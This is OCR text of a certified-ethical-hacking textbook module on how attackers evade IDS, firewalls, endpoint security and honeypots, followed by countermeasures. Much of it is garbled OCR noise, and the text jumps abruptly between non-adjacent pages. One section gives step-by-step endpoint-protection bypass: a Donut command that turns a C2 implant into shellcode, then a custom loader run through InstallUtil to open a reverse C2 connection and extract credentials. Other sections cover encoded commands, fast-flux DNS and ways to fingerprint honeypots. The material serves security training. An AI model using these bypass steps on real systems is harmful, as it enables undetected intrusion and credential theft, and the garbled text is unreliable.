Learning Objectives The widespread use of the Internet throughout the business world has boosted network usage in general. Organizations adopt various network security measures such as firewalls, intrusion detection systems (IDS), intrusion prevention systems (IPS), and “honeypots” to protect their networks. Networks are the most preferred targets of hackers for compromising an organization’s security, and attackers continue to find new ways to evade network security measures and attack these targets. This module provides deep insights into various network security technologies, such as IDS, IPS, firewalls, and honeypots. It explains the operations of these components as well as the various techniques used by attackers to evade them. Further, it describes the countermeasures necessary to prevent such attacks. At the end of this module, you will be able to: =
Describe IDS, IPS, firewall, and honeypot concepts
=
Use different IDS, IPS, firewall, and honeypot solutions
=
Explain different techniques to bypass IDS
=
Explain various techniques to bypass firewalls
=
Explain various techniques to bypass NAC and endpoint security
=
Use different tools to evade IDS/firewalls
=
Explain different techniques to detect honeypots
=
Adopt countermeasures against IDS/firewall evasion
Module 12 Page 1605
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Evading IDS, Firewalls, and Honeypots
Exam 312-50 Certified Ethical Hacker
CEH
LO#01: Summarize IDS, IPS, Firewall, and Honeypot Concepts
Copyright © by
All RightsReserved. Rep
Strictly Prohibited
IDS, IPS, Firewall, and Honeypot Concepts Ethical hackers should have an idea about the function, role, placement, and design of firewalls, IDS, IPS, and honeypots to protect an organization’s network by understanding how an attacker evades such security measures. This section provides an overview of these basic concepts.
Module 12 Page 1606
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Evading IDS, Firewalls, and Honeypots
Exam 312-50 Certified Ethical Hacker
Intrusion Detection System (IDS) ‘@
Anintrusion detection system
How an IDS Works
(IDS) is a software system or
hardware device that inspects all inbound and outbound network traffic for suspicious patterns that may indicatea network or system security breach @
CEH Signature File Comparison
r
Alarmnotifies admin and padet
The IDS checks traffic for
canbe dropped
signatures that match known intrusion patterns and signals
>
an alarm when a match is found
coon
@ Depending on the trafficto be monitored, the IDS is placed outside/inside the firewall to monitor suspicious
traffic
originating from outside/inside the network
eased
‘eut down from that IP source
Stateful Protocol Analysis
Packets dropped
Enterprise Network
Intrusion Detection System (IDS) An intrusion detection system (IDS) is a security software or hardware device used to monitor, detect, and protect networks or systems from malicious activities; it alerts the concerned security personnel immediately upon detecting intrusions. IDS are extremely useful as they monitor the inbound/outbound traffic of the network and check for suspicious activities continuously to detect a network or system security breach. Specifically, they check traffic for signatures that match known intrusion patterns and raise an alarm when a match is detected. IDS can be categorized into active and passive IDS depending on their functionality. A passive IDS generally only detects intrusions while an active IPS not only detects intrusions in the network but also prevents them. Main Functions of IDS: =
An IDS gathers and analyzes information from within a computer or a network to identify possible violations of the security policy, including unauthorized access, as well as misuse.
=
An IDS is also referred to as a “packet sniffer,” which intercepts packets traveling via various communication media and protocols, usually TCP/IP.
=
The packets are analyzed after they are captured.
=
An IDS evaluates traffic for suspected such intrusions.
intrusions and
raises an alarm
upon
detecting
Where IDS resides in the network One of the most common places to deploy an IDS is near the firewall. Depending on the traffic to be monitored, an IDS is placed outside/inside the firewall to monitor suspicious traffic Module 12 Page 1607
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Evading IDS, Firewalls, and Honeypots
Exam 312-50 Certified Ethical Hacker
originating from outside/inside the network.
When
placed inside, the IDS will be ideal if it is
near a DMZ; however, the best practice is to use a layered defense by deploying one IDS in front of the firewall and another one behind the firewall in the network. Before deploying the IDS, it is essential to analyze the network topology, understand how the traffic flows to and from the resources that an attacker can use to gain access to the network, and identify the critical components that will be possible targets of various attacks against the network. After the position of the IDS in the network is determined, the IDS must be configured to maximize its network protection effect.
IDS/IPS
User
Intranet Figure 12.1: Placement of IDS
How an IDS Works The primary purpose of the IDS is to provide real-time monitoring and detection of intrusions. Additionally, reactive IDS (and IPS) can intercept, respond to, and/or prevent intrusions. An IDS works as follows: =
IDS have sensors to detect malicious signatures in data packets, and some advanced IDS include behavioral activity detection to detect malicious traffic behavior. Even if the packet signatures do not match perfectly with the signatures in the IDS signature database, the activity detection system can alert administrators about possible attacks.
=
If the signature matches, the IDS performs predefined actions such as terminating the connection, blocking the IP address, dropping the packet, and/or raising an alarm to notify the administrator.
=
When signature matches, anomaly detection will be skipped; otherwise, the sensor may analyze traffic patterns for an anomaly.
=
When the packet passes all the tests, the IDS will forward it to the network.
Module 12 Page 1608
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Evading IDS, Firewalls, and Honeypots
Exam 312-50 Certified Ethical Hacker
IDS Preprocessor Signature File
Comparison
“>|
Signature File Internet
Router
Database
Firewall
4
Anomaly
Alarm notifies admin and packet can be dropped
Detection
Action Rule
Stateful Protocol
Cisco log sever
PAS
Connections are cut down from that IP source
Analysis
Enterprise Network
®*'S)
Packet is
| GruntHTTP
DotNetversion +| Neto »
Vahdatecen True
UseCentPinning +| Tue
.
Delay
siterPercent
Connectaitempts
xilloate
“& Download | Figure 12.71: Screenshot of Covenant C2 Framework
Module 12 Page 1748
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Evading IDS, Firewalls, and Honeypots =
Exam 312-50 Certified Ethical Hacker
Step 2: Use the Donut tool to transform payload into position-independent shellcode: ./donut
-c
GruntStager
-a
3
-b
2
-z
2
-x
-e
3
GruntHTTP.exe
-o
gruntloader.bin
Red_Teaming/donut® ./donut -c GruntStager -a
3 -b 2 -
~e 3 GruntHTTP.exe
-o gruntloader.bin
Donut shellcode generator v0.9.3
Copyright (c) 2019 TheWover, Odzhan
Instance type : Embedded Module file “GruntHTTP.exe" Entre : Random names + Encryption Compressed aPLib (Reduced by 55%) File type 2 .NET EXE Target CPU: x86+amd64 AMSI/WOLP jort Shellcode “gruntloader.bin* Red Teaming/donut# Figure 12.72: Screenshot of Donut
=
Step 3: Employ a custom generated above: file
.NET
Custom_Loader_SEP.cs
[custom_Loader_sEP.cs: [customLoader.exe:
A:
loader or
to
run
the
position-independent
shellcode
CustomerLoader.exe
Loader_SE! \ce:System. Configuration. Install.dll -sdk:4 -out:CustomLoader.exe Custom_Loader_SEP.cs
PE32 executable (console) Intel 80386 Mono/.Net
assenbly, for MS Windows
Figure 12.73: Screenshot showing loader compilation
=
Step 4: Run the loader using InstallUtil.exe as a LOLBin to execute the shellcode in the system memory to create a reverse C2 connection evading the SEP solution:
0;000003e7) 0 0 34870 wr aumiontty ssa Token + (0;000c0c27) 1 0 S782 ULasenven\saninistrator
Figure 12.74: Extracting system credentials bypassing the SEP solution
Module 12 Page 1749
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures Evading IDS, Firewalls, and Honeypots
Exam 312-50 Certified Ethical Hacker
Other Techniques for Bypassing Endpoint Security Hosti
ostin Stes
Phishin
g
Passing Encoded Commands
Fast Flux DNS Method
Timing-based
Evasion
. Signed Binary= Proxy Execution
CE H
@ EDR uses blacklistedIP addresses that are regularly updated through multiple sources @
Most cloud infrastructure
services are not listed in the blacklist; therefore, attackers exploit this feature to
host phishing websites on popular cloud infrastructures such as Google Cloud and AWS
© Attackers sendcommands encodedwith, for example, Base64to cover their arguments and code to evade EDR detection @ Attackersalso use hex-format encryption to ping different IP addressesto evade detection
© The Fast Flux method allows attackers to change both the IP addresses and DNS names rapidly
© Ithelpsthe attackers circumvent blacklists and hide the C&C server behind the compromised systems operatingas reverse proxies
©
Itisa sandbox evasion technique where malware is executed duringa specifictime or after certain actions
performed by the victim
© Forexample, usingsleep patching, delay APIs, and time bombs © Attackers leverage trusted in-built utilities such as rundll.32 for the execution of malicious codes to evade the EDR solutions
© The legitimate utilities are signed with digital certificates and help in proxyingthe malicious code execution Stcty Prohibited
Other Techniques for Bypassing Endpoint Security Attackers use various evasion techniques to maintain persistence on a compromised system by avoiding different sandboxing services, UBA or SIEM solutions, which generate behavior-based alerts. They evade various security controls of a network after compromising a system for maintaining stealth and expanding malicious activities. Organizations may use different security controls such as IDS, IPS, or EDRs, but attackers can also implement various techniques to hide their activities and remain undetected. Therefore, to evade both behavior-based EDR tools, attackers take advantage of sophisticated mechanisms and advanced malware to hide their malicious operations. =
Hosting Phishing Sites on Popular Infrastructure The EDR mechanism used in organizations can block the IP addresses involved in phishing campaigns and other malicious activities to protect the end device. It uses blacklisted IP addresses that are regularly updated through multiple sources. Attackers exploit this feature and use legitimate website hosting cloud infrastructure services such as Google Cloud and AWS to host phishing websites and perform phishing attacks against the target organizations. The endpoint security implemented on the end devices can only prevent users from malicious IP addresses registered in the blacklist. Most popular hosting infrastructure services are not listed in the blacklist; therefore, attackers use them as command and control servers to perform malicious activities. Attackers can also use popular social media accounts to distribute malware by hiding malicious code in the uploaded photos or other multimedia files using steganography. Already infected malware reads the instructions hidden in the photos and acts accordingly to evade the endpoint security on the target system.
Module 12 Page 1750
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Evading IDS, Firewalls, and Honeypots =
Passing Encoded Commands Attackers can pass encrypted commands to circumstances. For example, passing Base64 cover their arguments and code. Attackers different IP addresses for avoiding detection
=
Exam 312-50 Certified Ethical Hacker
bypass the detection mechanisms in specific encoded commands will allow attackers to can also use hex-format encryption to ping by security mechanisms.
Fast Flux DNS Method Attackers can implement malware that uses various tricks for executing code that cannot be detected by security solutions. The fast flux method allows attackers to change both the IP addresses and DNS names rapidly, and is typically utilized by large botnets. This technique allows attackers to evade various security controls. It also helps the attacker to circumvent blacklists and hide the C&C server behind the compromised systems operating as reverse proxies. In this process, a victim system will only connect to the fast flux agents instead of the legitimate C&C server.
=
Timing-based Evasion This is a sandbox evasion technique where malware is executed during a specific time or after certain actions by the victim. The actions may include opening a particular window and clicking it, which activates it after the system reboots. Some other examples are sleep patching, delay APIs, and time bombs.
=
Signed Binary Proxy Execution This technique allows attackers to leverage trusted in-built utilities for the execution of malicious codes to evade EDR solutions. Attackers use these legitimate or trusted utilities because they are signed with digital certificates and help in proxying the malicious code execution. For example, attackers can take the advantage of rund11.32 for executing malicious commands.
Module 12 Page 1751
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Evading IDS, Firewalls, and Honeypots
Exam 312-50 Certified Ethical Hacker
CEH
LO#06: Use IDS/Firewall Evading Tools
tly Prohibited.
IDS/Firewall Evading Tools Traffic IQ Professional Traffic 1Q Professional generates custom attack traffic which allows
attackers to bypass the installed perimeter devices in the target
&
N map nps://omap.org
Ei
Metasploit
network
‘https://www.metasploit.com
Inundator
(Q._hnttosi//sourceforge.net
FQ
ntpsi//ww.ioppcom.com
1DS-Evasion
naps: att.com
Hyperion-2.3.1
‘htps://mullsecurity.net
Stcty Prohibited
IDS/Firewall Evading Tools During firewall evasion, attackers use various security-auditing tools that assess firewall behavior. This section lists some of these tools that help attackers to bypass firewall restrictions. They automate the process of bypassing firewall rules while increasing effectiveness and consuming less time.
Module 12 Page 1752
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Evading IDS, Firewalls, and Honeypots =
Exam 312-50 Certified Ethical Hacker
Traffic 1Q Professional
Source: https://www.idappcom.com Traffic 1Q Professional is a tool that audits and validates the behavior of security devices by generating the standard application traffic or attack traffic between two virtual machines. This tool is generally used by security personnel for assessing, auditing, and testing the behavioral characteristics of any non-proxy packet-filtering device, which can include application firewalls, IDS, IPS, routers, switches, etc. However, as this tool can generate custom attack traffic, it is extensively employed by attackers to bypass the installed perimeter devices in the target network.
(@ idappcom - Tati Profesional - Fre Licence: 15 days remaining Bie Hep Gre yp come EGY= san GP one 5 BDirpor |
[ee
vey O
-
tar (svt | =BEL, tes BI set Tole Replay
rae @ 8
Soactre ers 1601 100 Pat
7 PPrgenfies rog les (6) oer ee
teracom on Secue pte B Googe © Hess Intell tla ineret Egle Iromsion Bove fon S Common atl Festay le 10Pro 0) Help Flee ty a Mogreo Sofwore 5O eee MDS cebu Aenae seSern (Cy Microsott Mees iron Ofce Merest SOL Serve GyG NeroehNET
ena one ao
Casale rersess02te0 Foto
econ
&
[Backdoor X}100 1.05 kar Bectcn: Rebate $tar stan SxS ecko: AckCnd Sk Bactcee AckCnd kapose Ans Becket Backdoor Ala pcanar Here coh Bockdoo ArerdeS pez Fa hans ASL Bectcot AOL Aan10S Seep Becket Backdoor Aayin ke [Backdoor Asylum 1.05 poap Bockdoo Asan 195 kerpea Bectcer aghen 13S volun shox BeckdooBFBF Evelnon Boctcne Bsctdea Beck Oncesoct ts Bock Back OtceSceao Bectdoo Backage 31 ta Bockdoo 31.1 Speso2S kar Bectcet Bachage Bocconmucton | Backdoor BackConstruction 1.2S.pcap Becker Beciconectn 18S ha Bectcoo BockConct BacConmacta Bock: Backtonencto Becton
BS cstrensnee
‘Adopter Statue
i
x
0
Eereeree
Tile Sau Fara Wcire Bs etree -
I
|
Packet Slat
Figure 12.75: Screenshot of Traffic 1Q Professional
Some additional IDS/firewall evasion tools are as follows: =
Nmap (https://nmap.org)
=
Metasploit (https://www.metasploit.com)
=
Inundator (https://sourceforge.net)
=
IDS-Evasion (https://github.com)
=
Hyperion-2.3.1 (https://nullsecurity.net)
Module 12 Page 1753
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Evading IDS, Firewalls, and Honeypots
Exam 312-50 Certified Ethical Hacker
|
Packet Fragment Generator Tools |
CEH
Colasoft Packet Builder
|
| packets. Attackers use this tool to create custom malicious packets and fragment | them in such a way that firewalls will not detect them
| |
| colasot Packet Builder is used to create custom network packets and fragmenting
CommView
| & |
NetScanTools Pro
s/s eteconookcom Ostinato ps /festnat.org
&
tater
tps://wru.colsofecom
WAN Killer [O,ps:/faneu.solarwinds.com
WireEdit secon wire ction is Stitly Profibited.
Packet Fragment Generator Tools There are various packet fragment generators that attackers use to perform attacks on firewalls to bypass them.
=
fragmentation
Colasoft Packet Builder Source: https://www.colasoft.com Colasoft Packet Builder is used to create custom network packets and fragmenting packets. Attackers use this tool to create custom malicious packets and fragment them such that firewalls cannot detect them. They can create custom network packets such as Ethernet Packet, professionals use intruders.
Module 12 Page 1754
ARP Packet, IP Packet, TCP Packet, and UDP Packet. Security this tool to check your network’s protection against attacks and
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Evading IDS, Firewalls, and Honeypots ® Colasoft Packet Builder File Edit Send Help @ #@#\¢@ ¢@\o Import Export Add Insert | Copy
MY destination Address WY source address BP Protocol 7; Prordnare Type
-
o
x
» © ® | @ Send Send All Adapter About
@. 208000000 Second FPR IFRLERSER IEE :00:00:00:00:00 } :
Figure 12.76: Screenshot of Colasoft Packet Builder
Some additional packet generator tools are listed below: =
CommView (https://www.tamos.com)
=
NetScanTools Pro (https://www.netscantools.com)
=
Ostinato (https://ostinato.org)
=
WAN Killer (https://www.solarwinds.com)
=
WireEdit (https://omnipacket.com)
Module 12 Page 1755
Ethical Hacking and Countermeasures Copyright © by EC-Coul All Rights Reserved. Reproduction is Strictly Prohib
Ethical Hacking and Countermeasures Evading IDS, Firewalls, and Honeypots
Exam 312-50 Certified Ethical Hacker
CEH
LO#07: Demonstrate Different Techniques to Detect Honeypots
Copyright © by
Reproduction is Strictly Prohibited
Detecting Honeypots
CE H
@ Attackers can determine the presence of honeypots by probing the services running on the system @ Attackers craft malicious probe packets to scan for services such as HTTP over SSL (HTTPS), SMTP over SSL (SMPTS), and IMAP over SSL (IMAPS)
@ Ports that show a specific service running but deny a three-way handshake connection indicate the presence ofa honeypot Tools to detect honeypots:
©
Send-safe Honeypot Hunter (http://www.send-safe.com)
© kippo_detect (https://github.com)
Note: Attackers can alsodefeat the purposeof honeypots by using multi-proxies (TORs) and hiding their conversation using encryption and steganography techniques AlRights Reserved. Reproduction i Stcty Prohibited
Detecting Honeypots Honeypots are traps set to detect, deflect, or counteract unauthorized intrusion attempts. While attempting to break into the target network, attackers perform honeypot detection using various tools and techniques. This section discusses these tools and how they are used. A honeypot is an Internet system designed primarily for diverting attackers by tricking or attracting them during their attempts to gain unauthorized access to information systems. Module 12 Page 1756
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Evading IDS, Firewalls, and Honeypots
Exam 312-50 Certified Ethical Hacker
Attackers can determine the presence of honeypots by probing the services running on the system. Attackers use honeypot detection systems or methods to identify the honeypots installed on the target network. They craft malicious probe packets to scan for services such as HTTP over SSL (HTTPS), SMTP over SSL (SMPTS), and IMAP over SSL (IMAPS). Ports that show a particular service running but deny a three-way handshake connection indicate the presence of a honeypot. Once they detect honeypots, attackers try to bypass them so that they can focus on targeting the actual network. Tools to detect honeypots include Send-safe Honeypot Hunter (http://www.send-safe.com) and kippo_detect (https://github.com). Note: Attackers can also defeat honeypots by using multi-proxies conversation using encryption and steganography techniques.
Module 12 Page 1757
(TORs)
and
hiding their
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Evading IDS, Firewalls, and Honeypots
Exam 312-50 Certified Ethical Hacker
Detecting and Defeating Honeypots
CEH
Detecting the presence | @ Observe of rT Tar Pits the latency of the response from the service
Detectingthe presence | @ Analyze the TCP window size, where tar pits continuously acknowledge Incoming packets of Layer 4 Tar Pits
Detecting the presence
of Layer 2 Tar Pits
Detecting running on HoneyPots VMware
even though the TCP window size is reduced
to zero
@ fan attacker is present on the same network as the Layer 2 tar pits, then the attacker can detect the presence of this daemon by looking at the responses with unique MAC address 0:0:f:ff:ff:ff which act as a kind of black hole
|
| & observe the IEEE standards for the current range of MAC addresses assigned to VMWare inc.
Detecting presence || © Perform time-based TCP Finger printing methods (SYN Proxy behavior) GfHoneyd theHoneypot Copyright © by
AlIRights Reserved. Reproduction i Strictly Prohibited
Detecting and Defeating Honeypots (Cont’d) Detecting the presence * ofUser-ModeLinux (UML) Honeypot
Detecting ihe presence of
Sobek
bases
Honeypots
|
|
CE H
@ Analyze the files such as /proc/mounts, /proc/interrupts, and /proc/cmdline, which contain UML-specific information |@ Sebek logs everything that is accessed via read() before transferring it to the network, causing the congestion effect. Analyze the congestion in the network layer
Detecting the presence of Snort_inline Honeypot
| @ Analyze the outgoing packets by capturing the Snort_inline modified packets through another host system and identifying the packet modification
Detecting the presence of Fake AP
Fake access points only send beacon frames and do not generate any fake traffic on the | |@ access points and an attacker can monitor the network traffic and easily notice the presence of a fake AP
Detecting the presence of Bait and Switch Honeypots
| |G Observe specific TCP/IP parameters such as Round-Trip Time (RTT), the Time To Live (TTL), and the TCP timestamp is Strictly Prohibited
Detecting and Defeating Honeypots A honeypot is a security mechanism that is deployed to counterattack and trap attackers. Honeypots lure attackers into performing malicious activities, and this attack information provides insights into the level and type of threats a network infrastructure can face. As an attacker, determining whether the target system is a legitimate one or a honeypot is essential to compromise the network without being detected. Identifying and defeating these honeypot establishments stealthily is the fundamental task of a professional hacker. Module 12 Page 1758
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Evading IDS, Firewalls, and Honeypots Some techniques discussed below:
Exam 312-50 Certified Ethical Hacker
used to identify,
detect,
and
defeat various
honeypot
infrastructures are
Detecting the presence of Layer 7 Tar Pits: Tar pits are security entities that are similar to honeypots, which are designed to respond slowly to incoming requests. They slow down unauthorized attempts of hackers. Layer 7 tar pits react slowly to incoming SMTP commands by attackers/spammers. Attackers can identify the presence of Layer 7 tar pits by looking at the latency of the response from the service. Detecting the presence of Layer 4 Tar Pits: Layer 4 tar pits manipulate the TCP/IP stack and are effectively employed to slow down the spreading of worms, backdoors, etc. In these tar pits, the iptables accept the incoming TCP/IP connection and spontaneously switch to a zero-window size, blocking the attacker from sending further data. This connection cannot be terminated by the attacker, as no data is transferred to the target machine. Layer 4 tar pits such as Labrea can be identified by the attacker by analyzing the TCP window size, where the tar pit continuously acknowledges incoming packets even though the TCP window size is reduced to zero. Detecting the presence of Layer 2 Tar Pits: If an attacker launches an attack from the same network, the issue of Layer 2 arises. Layer 2 tar pits are used to block the network penetration of the attacker who gains access to the network as well as to prevent internal threats. The attacker can detect the presence of this daemon by looking at the responses with the unique MAC address 0:0:f:ff:ff:ff, which acts as a kind of black hole. An attacker can also identify the presence of these tar pits by analyzing the ARP
responses.
Detecting Honeypots running on VMware: VMWare is a commercially available virtual machine that is used to launch multiple instances of an OS simultaneously. These virtual machines can be configured with various virtual machine resources such as CPU, memory, disks, I/O devices, etc. Owing to its numerous advantages, VMWare is widely used to launch honeypots. Attackers can identify instances that are running on the VMWare virtual machine by analyzing the MAC address. By looking at the IEEE standards for the current range of MAC addresses assigned to VMWare Inc., an attacker can identify the presence of VMWare-based honeypots. Detecting the presence of Honeyd Honeypot: Honeyd is a widely used honeypot daemon. It is used to create thousands of honeypots easily. It is a network-simulated and service-simulated honeypot deployment engine. This honeyd honeypot can respond to a remote attacker who tries to contact the SMTP service with fake responses. Echo “220 intranet ESMTP sendmail 8.1” While read data 4 if data ~ “HELO” then if data ~ “MAIL FROM” then.
Attacker Figure 12.77: Honeyd fake response
Module 12 Page 1759
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Evading IDS, Firewalls, and Honeypots
Exam 312-50 Certified Ethical Hacker
An attacker can identify the presence of honeyd honeypot by performing time-based TCP fingerprinting methods (SYN proxy behavior). The following figure shows the difference between a response to a normal computer and the response of honeyd honeypot to a manual SYN request sent by an attacker.
TIMEOUT
a
Figure 12.78: Response to SYN request by normal computer vs. Honeyd Honeypot
=
Detecting the presence of User-Mode Linux (UML) Honeypot: User-Mode Linux is an open-source software under GNU, which is used to create virtual machines and is efficient in deploying honeypots. Attackers can identify the presence of UML honeypots by analyzing files such as /proc/mounts, /proc/interrupts, and /proc/cmdline, which contain UML-specific information.
=
Detecting the presence of Sebek-based Honeypots: Sebek is a server/client-based honeypot application that captures the rootkits and other malicious malware that hijacks the read() system call. Such honeypots record all the data accessed via reading () call. Attackers can detect the existence of Sebek-based honeypots by analyzing the congestion in the network layer, as Sebek data communication is usually unencrypted. Since Sebek logs everything that is accessed via reading () call before transferring to the network, it causes the congestion effect.
=
Detecting the presence of Snort_inline Honeypot: Snort_inline is a modified version of Snort IDS that is capable of packet manipulation. It can rewrite rules in the iptables and is mainly used in Genll (2nd generation) honeynets to block known attacks and avoid attacker bouncing. Attackers can identify these honeypots by analyzing the outgoing packets. If an outgoing packet is dropped, it might look like a black hole to an attacker, and when the snort_inline modifies an outgoing packet, the attacker can capture the modified packet through another host system and identify the packet modification.
=
Detecting the presence of Fake AP: Fake access points are those that create fake 802.11b beacon frames with randomly generated ESSID and BSSID (MAC address) assignments. Fake access points only send beacon frames but do not produce any fake traffic on the access points, and an attacker can monitor the network traffic and quickly note the presence of fake AP.
=
Detecting the presence of Bait and Switch Honeypots: Bait and switch honeypots actively participate in security mechanisms that are employed to respond quickly to incoming threats and malicious attempts. They redirect all malicious network traffic to a honeypot after any intrusion attempt is detected. An attacker can identify the presence of such honeypots by looking at specific TCP/IP parameters such as the Round-Trip Time (RTT), the Time To Live (TTL), and the TCP timestamp.
Module 12 Page 1760
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Evading IDS, Firewalls, and Honeypots
Exam 312-50 Certified Ethical Hacker
Honeypot Detection Tools: Send-Safe Honeypot Hunter (@ Send-Safe Honeypot Hunter is a tool designed for checking
lists of HTTPS and SOCKS proxies for "honey pots”
[© see ste Honea arte 3228 DEMO * Seta: Ste Abo Pwo check: [C\Pogam Fes pBBiSend Sle Horaypat Hiri DEMOWeatva >| [ZX]
Features:
Checks lists of HTTPS, SOCKS4, and SOCKSS proxies with
any ports
.
Checks several remoteor local proxylists at once
ae
AFstd oes tong ater honest: i tone
Use prories:
Can upload "Valid proxies" and "All except honeypots" files
to FTP isd
Can process proxylists automatically every specified time interval
May be used for usual proxylist validating as well
ante tad
ele
Number recs fF mist Croce: —— check
Litre
Cee
—
sure at [5
eh
wietetotie
Leplevet (0: NoLonina
Coreckpromketerey 50 nintes (Reda atercheck Powbpe: [AUTO Taae ea eaees : =
y
Tin) fra Send sof cor Strcy Pro
Honeypot Detection Tools Attackers user honeypot detection tools such as Send-Safe Honeypot Hunter (http://www.sendsafe.com) and kippo_detect (https://github.com) to detect honeypots in the target organizational networks.
=
Send-Safe Honeypot Hunter Source: http://www.send-safe.com Send-Safe Honeypot Hunter is a tool designed for checking lists of HTTPS and SOCKS proxies for "honey pots.“ Features:
o
Checks lists of HTTPS, SOCKS4, and SOCKSS5 proxies with any ports
o
Checks several remote or local proxylists at once
o
Can upload "Valid proxies" and "All except honeypots" files to FTP
o
Can process proxylists automatically in every specified period
o
May be used for usual proxylist validating as well
Module 12 Page 1761
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Evading IDS, Firewalls, and Honeypots
Exam 312-50 Certified Ethical Hacker
@ Send-Safe Honeypot Hunter 3.2.28 --- DEMO Settings
Status
-
x
About
Proxylists to check:
[C:\Program Files (x86)\Send-Safe Honeypot Hunter DEMO\texttxt
f
Output
Valid proxies: Failed proxies:
C:\Program Files (x86)\Send-Safe Honeypot Hunter DEMO \goc C:\Program Files (x86)\Send-Safe Honeypot Hunter DEMO \faile
(A Honeypots:
C:\Program Files (x86)\Send-Safe Honeypot Hunter DEMO \hor |
Mall exept honeypots:
[C:\Program Files (x86)\Send-S.afe Honeypot Hunter DEMI
Options Use proxies:
Number of threads: [59 Connection timeout:
|15
Number of etties:
[7
ListenerIP: [192.168.0244 ClientIP: (1921680244
v Vv
remote remote
SMTP Port: | 25
__list.dsblorg
RBL Check:
Save working proxies (before RBL check) to Check RBL first
Check prowylst every Elapsed time: 0.00.00
‘Wiite log to file
30
minutes
Started:
N/A
Loglevel:
0 -No Logging
Restart after check
Proxytype:
Stop
v AUTO
89
Start
Figure 12.79: Screenshot of Send-Safe Honeypot Hunter
Module 12 Page 1762
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Evading IDS, Firewalls, and Honeypots
Exam 312-50 Certified Ethical Hacker
CEH
LO#08: Explain IDS/Firewall Evasion Countermeasures
tly Prohibited.
IDS/Firewall Evasion Countermeasures The previous sections discussed various tools and techniques used by attackers to bypass network security perimeters such as IDS, firewalls, and honeypots to enter target networks. It is necessary to deploy and configure these security mechanisms securely to avoid attacks. This section thus discusses various countermeasures and best practices for hardening such network security perimeters.
Module 12 Page 1763
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Evading IDS, Firewalls, and Honeypots
Exam 312-50 Certified Ethical Hacker
How to Defend Against IDS Evasion Shut down switch ports associated with known attack hosts
8 |
CEH Ensure packets that thetoIDSbe normalizes packetsorderand allows those reassembledfragmented in the proper
Perform an in-depth analysis of ambiguous network traffic for all possiblethreats
Define DNS server for client resolver in routers or similar network devices
Use TCP FIN or a Reset (RST) packetto terminate malicious TCP sessions
Harden the security of all communication devices such as modems and routers
Look for thea nop opcode other than 0x90to defend against the polymorphic shellcode problem
If possible, block ICMP TTL expired packetsat the external interface level and changethe TTL field to a large value
‘Train to identify attack devices patterns and regularly update/patch all theusers systems and network
Regularly update theantivirus signature database
Deploy IDS after a thorough analysis of the network topology, nature of networkttraffic, and number of hosts to monitor
Use a traffic normalization solution at the IDS to protect thesystem against evasions
Use a traffic normalizer to remove potential ambiguity from the packet streambefore it reaches the IDS
Storetheattack information (attackerIP, victim IP, timestamp, etc.) for futureanalysis Strcy Pro
How to Defend Against IDS Evasion =
Shut down switch ports associated with known attack hosts.
=
Perform an in-depth analysis of ambiguous network traffic for all possible threats.
=
Use TCP FIN or Reset (RST) packet to terminate malicious TCP sessions.
=
Look for the nop opcode other than 0x90 to defend against the polymorphic shellcode problem.
=
Train users to identify attack patterns and regularly update/patch all the systems and network devices.
=
Deploy IDS after a thorough analysis of the network topology, nature of network traffic, and number of hosts to monitor.
=
Use a traffic normalizer to remove potential ambiguity from the packet stream before it reaches the IDS.
=
Ensure that the IDS normalizes fragmented reassembled in the proper order.
=
Define DNS server for client resolver in routers or similar network devices.
=
Harden the security of all communication devices such as modems and routers.
=
If possible, block ICMP TTL expired packets at the external interface level and change the TTL field to a considerable value, ensuring that the end host always receives the packets.
=
Regularly update the antivirus signature database.
Module 12 Page 1764
packets and
allows those
packets to be
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Evading IDS, Firewalls, and Honeypots
Exam 312-50 Certified Ethical Hacker
=
Use a traffic normalization solution at the IDS to protect the system from evasions.
=
Store the attack information (attacker IP, victim IP, timestamp, etc.) for future analysis.
=
Ensure that the packets are arriving from a path secured with IDS; if not, perform a deep analysis on packets arriving from non-IDS paths.
=
Ensure that snort rules are perfectly configured to avoid DoS attacks using snort false positives.
=
Periodically check for malicious script injection in snort rules directory.
=
